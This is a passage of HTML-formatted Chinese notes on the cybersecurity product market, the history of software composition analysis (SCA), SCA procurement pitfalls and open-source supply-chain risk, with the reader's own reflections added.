Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">5.3 业务影响和平衡</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">6 未来趋势和展望</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">6.1 甲方观点看安全产品演进</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">&#34;拳套&#34;→&#34;保镖&#34;→&#34;免疫力&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">        - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">可有可无→阻碍业务→与业务协同)</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">6.2 安全厂商视角的SCA发展</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">    - </span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">6.3 其他</span></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">1 </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">网络安全产品市场概况</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">1.1 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">中国网络安全产品用户调查报告</span>    <o:page></o:page></p><p><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000377" data-ratio="0.6841593780369291" data-type="png" data-w="1029" height="378.739990234375" style="height: auto !important;" width="553.739990234375" src="https://wechat2rss.xlab.app/img-proxy/?k=e0bab867&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINwMjZkHduL1qDX7Ugiaephs61TDibfnfnXviaog0WT2kJs1VHWoLLvMQ4OmauB8SD4asA1z0iahrqbd7g%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">安全从业人员，特别是甲方的高级管理人员，应该仔细研究这张图表。安全管理人员的工作，可以比喻为以前的电脑装机工作，现在则是在组织中&#34;拼装&#34;安全产品体系。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;background:#FF00FF;mso-highlight:#FF00FF;">【思】拼装能带来什么？带不来安全产业的高质量发展；未来的形态是什么？是厂商群雄争霸？是厂商集中到寡头，还是甲方成长后抛弃一众乙方</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">？</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{张威线下解答} 安全产业随着业务变化而变化，业务类型越多，安全产品越杂，未来安全会分化成一个个大板块，比如安全司法，数据交易保护，安全保险等领域。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">1.2 SCA</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">的发展概述</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">SCA技术经历了从手动到自动化,从单一工具到集成解决方案的发展过程,逐渐成为软件开发安全不可或缺的组成部分。</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="50" valign="top" style="width:48.1pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">阶段</span></p></td><td width="79" valign="top" style="width:77.85pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">时间</span></p></td><td width="424" valign="top" style="width:419.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">特点</span></p></td></tr><tr><td width="50" valign="top" style="width:49.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">萌芽期</span>        <o:page></o:page></p></td><td width="79" valign="top" style="width:78.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2000年代初期</span></p></td><td width="424" valign="top" style="width:417.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• 主要依靠人工手动进行</span></p><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• 企业开始意识到管理和审计开源组件的重要性</span></p></td></tr><tr><td width="50" valign="top" style="width:49.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">发展期</span></p></td><td width="79" valign="top" style="width:78.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">约2002年左右</span></p></td><td width="424" valign="top" style="width:417.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• 出现了自动化工具和漏洞数据库</span></p><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• Black Duck Software公司成立，开发了早期的解决方案和社区</span></p></td></tr><tr><td width="50" valign="top" style="width:49.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">成熟期</span></p></td><td width="79" valign="top" style="width:77.85pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2010年代</span></p></td><td width="424" valign="top" style="width:421.65pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• SCA工具变得更加成熟和普及多家公司推出SCA工具，如Sonatype、JFrog等</span></p><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• 2013年OWASP将&#34;使用含有已知漏洞的组件&#34;列入十大安全风险。2019年Gartner将SCA纳入AST应用安全范围</span></p></td></tr><tr><td width="50" valign="top" style="width:49.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">完善期</span></p></td><td width="79" valign="top" style="width:78.6pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2020年至今</span></p></td><td width="424" valign="top" style="width:417.45pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• SCA工具使用变得更加广泛，成为DevOps工具链的一部分</span></p><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• 与CI/CD等流程集成，实现自动化持续的安全合规性检查</span></p><p style=""><span style="font-size:9.0pt;mso-bidi-font-size:9.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">• 2022年以来，solarwinds/ log4j事件及科技战影响，SCA受到更多关注</span></p></td></tr></tbody></table><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">1.3 SCA</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">产品采购的挑战和策略</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">“安全产品采购的坑”</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 关注产品的高效性和快速响应能力,包括快速发现风险和快速应急处置。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 注意误报率,这与漏洞库的全面性和准确性,以及企业自身资产梳理的准确性有关。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. </span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">需要将各层级资产(网络、组织、业务等)关联起来</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">,才能精准定位风险并高效处置。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 关注漏洞库的更新模式是否契合企业需求,是否需要定制。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 对于互联网出口管控严格的企业,需考虑如何高效同步云端特征库到本地。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 如果与云端打通,要注意保护自身业务数据安全,避免引入新的安全风险。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">7. 前期准备工作要充分,包括漏洞库设计、资产梳理等,这样可以提高后期运营的精准性。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">8. 部署后还需要关注推动整改等后续工作。这是开发干的事，和安全分析无关。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">总的来说,采购前要充分考虑产品的适用性、安全性和可持续运营能力,做好前期准备工作很重要。</span></p><p><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">2 </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">供应链安全的重要性与挑战</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">2.1 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">科技战凸显供应链安全重要性</span></p><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;"><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">在科技战的背景下，实现软件自主化成为重要目标。尽管我们能够自主编写软件代码，但在开发过程中仍然依赖大量开源组件。这些开源组件本身存在潜在的安全风险。目前，我们自主开发的许多产品，特别是信息技术创新（信创）领域的产品，仍然广泛使用开源组件。因此，这些组件的安全风险反而成为了一个新的挑战。同时，开源组件的下载和使用次数持续快速增长，已经成为软件开发的主流支撑。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">2.2 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">开源组件风险及管理</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#3C87CD;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">软件资产的位置</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">这些软件存储位置包含了企业的代码仓库、制品仓库、镜像仓库，也怎样去做软件资产的梳理？</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;background:#FF00FF;mso-highlight:#FF00FF;">【思】还应包括运行环境，配置数据，可观测数据，后续嘉宾都提到了。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 